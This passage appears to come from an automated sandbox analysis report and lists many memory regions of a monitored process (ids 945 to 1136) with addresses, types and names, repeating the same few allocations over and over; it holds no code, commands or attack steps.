= "" Region: id = 945 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 946 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 947 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 948 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 949 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 950 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 951 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 952 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 953 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 954 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 955 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 956 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 957 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 958 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 959 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 960 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 961 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 962 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 963 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 964 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 965 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 966 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 967 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 968 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 969 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 970 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 971 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 972 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 973 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 974 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 975 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 976 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 977 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 978 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 979 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 980 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 981 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 982 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 983 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 984 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 985 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 986 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 987 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 988 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 989 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 990 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 991 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 992 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 993 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 994 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 995 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 996 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 997 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 998 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 999 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1000 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1001 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1002 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1003 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1004 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1005 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1006 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1007 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1008 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1009 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1010 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1011 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1012 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1013 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1014 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1015 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1016 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1017 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1018 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1019 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1020 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1021 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1022 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1023 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1024 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1025 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1026 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1027 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1028 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1029 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1030 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1031 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1032 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1033 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1034 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1035 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1036 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1037 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1038 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1039 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1040 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1041 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1042 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1043 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1044 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1045 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1046 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1047 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1048 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1049 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1050 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1051 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1052 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1053 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1054 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1055 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1056 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1057 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1058 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1059 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1060 start_va = 0x550000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1061 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1062 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1063 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1064 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1065 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1066 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1067 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1068 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1069 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1070 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1071 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1072 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1073 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1074 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1075 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1076 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1077 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1078 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1079 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1080 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1081 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1082 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1083 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1084 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1085 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1086 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1087 start_va = 0x550000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1088 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1089 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1090 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1091 start_va = 0x550000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1092 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1093 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1094 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1095 start_va = 0x550000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1096 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1097 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1098 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1099 start_va = 0x550000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1100 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1101 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1102 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1103 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1104 start_va = 0x550000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1105 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1106 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1107 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1108 start_va = 0x550000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1109 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1110 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1111 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1112 start_va = 0x550000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1113 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1114 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1115 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1116 start_va = 0x550000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1117 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1118 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1119 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1120 start_va = 0x550000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1121 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1122 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1123 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1124 start_va = 0x550000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1125 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1126 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1127 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1128 start_va = 0x550000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1129 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1130 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1131 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1132 start_va = 0x550000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1133 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1134 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1135 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1136 start_va = 0xf890000 end_va = 